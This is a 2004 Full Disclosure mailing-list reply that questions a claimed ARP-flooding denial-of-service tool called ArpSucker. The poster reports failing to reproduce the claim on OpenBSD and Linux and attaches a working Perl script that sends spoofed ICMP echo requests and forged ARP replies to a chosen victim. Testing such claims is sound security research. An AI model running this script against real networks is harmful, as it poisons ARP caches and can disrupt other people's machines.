Full Disclosure mailing list archives
Re: The ArpSucker is b0rn! Be yourself, be the net.
From: Gregory Steuck <greg () y2004 nest cx>
Date: Wed, 15 Sep 2004 02:31:46 -0700
"alpt" == alpt <alpt () freaknet org> writes:
alpt> Then when I tried to become all the 2^32-1 IPs, I realized alpt> that the attacked machine (elibus and pallotron, eheheh), were alpt> under a mortal DoS. The Elibus' machine was constantly at 100% alpt> of cpu until Elibus unplugged the eth0 cable, while the alpt> Pallotron's machine went in kernel panic!. Elibus uses an x86 alpt> arch with the linux kernel, pallotron uses An Apple I-book, alpt> with MacOsx. I am not sure if this report is accurate. I played a little with the attached perl script which should be doing the same thing that ArpSucker alleges to do. I ran the script against OpenBSD 3.6 and Linux 2.4.22-gentoo-r5. Both of them only accept the directly attached net addresses (/24 in my case) into the arp cache. Anything beyond that has no observable effect except echo reply sent along the default route. Running: arp-poison.pl <victim> <spoof_start> <count> <intf> Granted the performance of the script is way lower than a single process would have, but I doubt that running it any faster makes arp cache accept non-directly-connect entries. Has anybody validated the original claim? Thanks Greg #!/usr/bin/perl use strict; sub ip_to_int($) { my ($a, $b, $c, $d) = split(/\./, $_[0]); return ($a << 24) + ($b << 16) + ($c << 8) + $d; } sub int_to_ip($) { my ($ip) = @_; return ($ip >> 24) . "." . (($ip >> 16) & 255) . "." . (($ip >> 8) & 255) . "." . ($ip & 255); } sub system_or_die(@) { system (@_); die join(' ', @_) . " failed with exit code " . ($? >> 8) . "\n" unless $? == 0; } my $spoof_eth = '00:11:2f:77:77:77'; my ($victim_ip, $start_ip, $count, $intf) = @ARGV[0..3]; system_or_die ('ping', '-c', '1', $victim_ip); my $victim_eth = (split (/\s+/, `dnet arp show | grep $victim_ip`))[2]; die "Cannot determine $victim_ip's ethernet address received $victim_eth\n" unless split(/:/, $victim_eth) == 6; my $start_int = ip_to_int($start_ip); for (my $i = 0; $i < $count; $i++) { my $spoof_ip = int_to_ip($start_int + $i); system_or_die( qq[echo 'aaaaaaaaaaaa' | dnet icmp type 8 code 0 | dnet ip proto icmp src $spoof_ip dst $victim_ip | dnet eth type ip src $spoof_eth dst $victim_eth | sudo dnet send $intf ]); system_or_die( qq[dnet arp op rep sha $spoof_eth spa $spoof_ip tha $victim_eth tpa $victim_ip | dnet eth type arp src $spoof_eth dst $victim_eth | sudo dnet send $intf ]); } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- The ArpSucker is b0rn! Be yourself, be the net. Alpt (Sep 13)
- Re: The ArpSucker is b0rn! Be yourself, be the net. Stefan . Laudat (Sep 14)
- Re: Re: The ArpSucker is b0rn! Be yourself, be the net. VX Dude (Sep 14)
- Re: Re: The ArpSucker is b0rn! Be yourself, be the net. nirvana (Sep 14)
- Re: Re: The ArpSucker is b0rn! Be yourself, be the net. Barrie Dempster (Sep 14)
- Re: Re: The ArpSucker is b0rn! Be yourself, be the net. Syke (Sep 14)
- Re: Re: The ArpSucker is b0rn! Be yourself, be the net. VX Dude (Sep 14)
- Re: The ArpSucker is b0rn! Be yourself, be the net. H D Moore (Sep 16)
- <Possible follow-ups>
- RE: The ArpSucker is b0rn! Be yourself, be the net. Compton, Rich (Sep 14)
- Re: The ArpSucker is b0rn! Be yourself, be the net. Gregory Steuck (Sep 15)
- Re: The ArpSucker is b0rn! Be yourself, be the net. Stefan . Laudat (Sep 14)